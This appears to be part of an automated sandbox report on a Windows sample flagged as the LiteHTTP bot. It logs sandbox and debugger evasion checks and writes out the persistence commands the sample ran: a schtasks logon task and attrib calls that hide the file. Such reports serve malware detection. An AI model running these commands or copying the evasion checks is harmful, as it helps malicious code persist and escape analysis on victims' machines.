                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39658s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39408s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39283s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39158s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39033s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38783s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38658s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38533s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38408s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38285s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38173s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37267s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37127s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37002s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36877s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36642s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36502s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36377s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36127s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36017s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35877s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35642s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35502s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35142s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34978s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34487s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34362s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34237s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34111s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33986s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33736s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33611s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33486s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33361s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33236s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33111s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32987s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32861s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32736s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32612s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32486s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32346s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39705Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39580Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39455Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39330Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39205Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39080Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38955Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38830Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38705Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38580Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38455Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38330Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38205Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38080Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37955Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37799Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37674Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37549Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37424Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37299Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37117Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36994Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36893Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36768Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36643Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36518Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36393Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36268Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36143Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36017Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35893Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35768Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35643Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35518Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35393Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35268Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35143Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35018Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34893Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34768Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34643Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34395Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34001Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33877Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33752Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33627Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33502Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33377Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33252Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39658Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39547Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39408Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39283Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39158Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39033Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38908Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38783Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38658Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38533Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38408Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38285Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38173Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37799Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37393Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37267Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37127Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37002Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36877Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36752Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36642Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36502Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36377Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36252Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36127Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36017Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35877Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35752Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35642Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35502Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35393Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35252Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35142Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34978Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34487Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34362Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34237Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34111Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33986Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33862Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33736Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33611Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33486Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33361Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33236Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33111Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 32987Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 32861Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 32736Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 32612Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 32486Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 32346Jump to behavior
                    Source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000002.4541299248.00000000006ED000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: DQmU06kq9I.exe, 00000000.00000003.2732563595.00000000086D2000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4551880694.00000000086D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2_m,
                    Source: DQmU06kq9I.exe, 00000009.00000002.4553100366.000000000916B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-[vk
                    Source: DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: DQmU06kq9I.exe, 00000000.00000002.4541180333.00000000006ED000.00000040.00000001.01000000.00000003.sdmp, DQmU06kq9I.exe, 00000008.00000002.4541522203.00000000006ED000.00000040.00000001.01000000.00000003.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541299248.00000000006ED000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread information set: HideFromDebuggerJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: NTICE
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: SICE
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000002.4541299248.00000000006ED000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Program Manager
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LiteHTTP Bot
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4541067680.0000000000552000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4541316207.0000000000552000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4552255837.0000000008742000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4552402541.0000000008C02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2061776239.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4552122250.00000000087A2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.2654669900.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4552952321.0000000009062000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
